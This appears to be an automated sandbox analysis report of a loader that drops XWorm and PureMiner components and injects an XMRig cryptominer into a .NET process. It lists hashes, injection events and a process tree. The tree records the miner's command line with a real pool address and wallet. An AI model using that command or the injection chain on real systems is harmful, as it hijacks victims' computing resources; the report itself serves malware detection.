xmrig | 31045e8b843ce541daf06fd133180f8ff675b3f9b729a11c85c3137fab188256

Analysis

max time kernel
184s
max time network
194s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
13/10/2023, 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BypassLoader.exe
Size

803KB
MD5

7a55ed8e73f430327a2c8b189d837cd5
SHA1

ddbd958dc03cc94b4d7f035edc10826b8959c965
SHA256

31045e8b843ce541daf06fd133180f8ff675b3f9b729a11c85c3137fab188256
SHA512

ee8a6d6d6a284af233559b604d26be71b5079aa4c6619a2733fef8f3d60be3a9f09a617d1ec82094a23e9ba9aed0a81ea3ce25daab3ec49d10e57da0ca3aa316
SSDEEP

12288:QBCb1unQrlLM3z7PBWmEUWXS+CO0G03NquQENps9US+F:QIRhLM3QOwS+OG8YzENpf

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/memory/3944-30-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-31-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-32-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-34-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-35-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-36-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-37-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-38-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-39-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-40-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-42-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/3944-43-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
3920	XWormLoader.exe
2860	PureMiner.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2860 set thread context of 3944	2860	PureMiner.exe	76

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2428	3920	WerFault.exe	70

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe
2860	PureMiner.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2860	PureMiner.exe
Token: SeLockMemoryPrivilege	3944	AddInProcess.exe
Token: SeLockMemoryPrivilege	3944	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3944	AddInProcess.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 3920	2716	BypassLoader.exe	70
PID 2716 wrote to memory of 3920	2716	BypassLoader.exe	70
PID 2716 wrote to memory of 3920	2716	BypassLoader.exe	70
PID 2716 wrote to memory of 2860	2716	BypassLoader.exe	72
PID 2716 wrote to memory of 2860	2716	BypassLoader.exe	72
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76
PID 2860 wrote to memory of 3944	2860	PureMiner.exe	76

C:\Users\Admin\AppData\Local\Temp\BypassLoader.exe
"C:\Users\Admin\AppData\Local\Temp\BypassLoader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
  "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:3920
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 844
    3⤵
    - Program crash
    PID:2428
- C:\Users\Admin\AppData\Local\Temp\PureMiner.exe
  "C:\Users\Admin\AppData\Local\Temp\PureMiner.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.225.74.15:8383 -u 48Q5r42DnshBCULPq73bNXLwdJ2jng8QdDq6TZba79TGXL6Z4UNe61A2HUxqnNpUqn1JBZpm1Vv4XNxL28RBQUeR2RwVAGu.RIG_CPU_XMR -p x --algo rx/0 --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:3944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PureMiner.exe

Filesize
628KB

MD5
aab1dbe96f79d68a24833179fcb0aeed

SHA1
3a13dd38b46a94eb40972a07eb3864c4a207d299

SHA256
8cef12cc709544a09e84fda051fa24480b093cb33dc8f8306807391d0c3b6091

SHA512
e6a49984e9871a85c9307a1b4581e09bf0d1fe4cce6968746f17c61bfb8847dd4432b92a4b2588d38e2355ab95f7704a375e11e692984a310d080970f15e0202

Download Submit
C:\Users\Admin\AppData\Local\Temp\PureMiner.exe

Filesize
628KB

MD5
aab1dbe96f79d68a24833179fcb0aeed

SHA1
3a13dd38b46a94eb40972a07eb3864c4a207d299

SHA256
8cef12cc709544a09e84fda051fa24480b093cb33dc8f8306807391d0c3b6091

SHA512
e6a49984e9871a85c9307a1b4581e09bf0d1fe4cce6968746f17c61bfb8847dd4432b92a4b2588d38e2355ab95f7704a375e11e692984a310d080970f15e0202

Download Submit
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

Filesize
101KB

MD5
39d81ca537ceb52632fbb2e975c3ee2f

SHA1
0a3814bd3ccea28b144983daab277d72313524e4

SHA256
76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7

SHA512
18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

Filesize
101KB

MD5
39d81ca537ceb52632fbb2e975c3ee2f

SHA1
0a3814bd3ccea28b144983daab277d72313524e4

SHA256
76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7

SHA512
18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

Download Submit
memory/2716-14-0x00007FFC1D6F0000-0x00007FFC1E0DC000-memory.dmp

Filesize
9.9MB

Download
memory/2716-2-0x000000001BB00000-0x000000001BB10000-memory.dmp

Filesize
64KB

Download
memory/2716-1-0x00007FFC1D6F0000-0x00007FFC1E0DC000-memory.dmp

Filesize
9.9MB

Download
memory/2716-0-0x0000000000E80000-0x0000000000F50000-memory.dmp

Filesize
832KB

Download
memory/2860-16-0x0000022CEB6A0000-0x0000022CEB7A0000-memory.dmp

Filesize
1024KB

Download
memory/2860-17-0x0000022CEB7B0000-0x0000022CEB7C0000-memory.dmp

Filesize
64KB

Download
memory/2860-27-0x0000022CEB7B0000-0x0000022CEB7C0000-memory.dmp

Filesize
64KB

Download
memory/2860-15-0x00007FFC1D6F0000-0x00007FFC1E0DC000-memory.dmp

Filesize
9.9MB

Download
memory/2860-29-0x0000022CEB7B0000-0x0000022CEB7C0000-memory.dmp

Filesize
64KB

Download
memory/2860-28-0x0000022CEB7B0000-0x0000022CEB7C0000-memory.dmp

Filesize
64KB

Download
memory/2860-21-0x0000022CD1590000-0x0000022CD15E6000-memory.dmp

Filesize
344KB

Download
memory/2860-22-0x0000022CD15F0000-0x0000022CD163C000-memory.dmp

Filesize
304KB

Download
memory/2860-23-0x00007FFC1D6F0000-0x00007FFC1E0DC000-memory.dmp

Filesize
9.9MB

Download
memory/2860-24-0x0000022CEB7B0000-0x0000022CEB7C0000-memory.dmp

Filesize
64KB

Download
memory/2860-13-0x0000022CD10D0000-0x0000022CD1172000-memory.dmp

Filesize
648KB

Download
memory/2860-26-0x0000022CEB7B0000-0x0000022CEB7C0000-memory.dmp

Filesize
64KB

Download
memory/3920-25-0x0000000073BE0000-0x00000000742CE000-memory.dmp

Filesize
6.9MB

Download
memory/3920-20-0x0000000000F40000-0x0000000000F5E000-memory.dmp

Filesize
120KB

Download
memory/3920-19-0x0000000073BE0000-0x00000000742CE000-memory.dmp

Filesize
6.9MB

Download
memory/3944-30-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-31-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-32-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-33-0x00000197DB8F0000-0x00000197DB910000-memory.dmp

Filesize
128KB

Download
memory/3944-34-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-35-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-36-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-37-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-38-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-39-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-40-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-41-0x000001986DAB0000-0x000001986DAF0000-memory.dmp

Filesize
256KB

Download
memory/3944-42-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-43-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/3944-44-0x00000197DB940000-0x00000197DB960000-memory.dmp

Filesize
128KB

Download
memory/3944-45-0x00000197DB940000-0x00000197DB960000-memory.dmp

Filesize
128KB

Download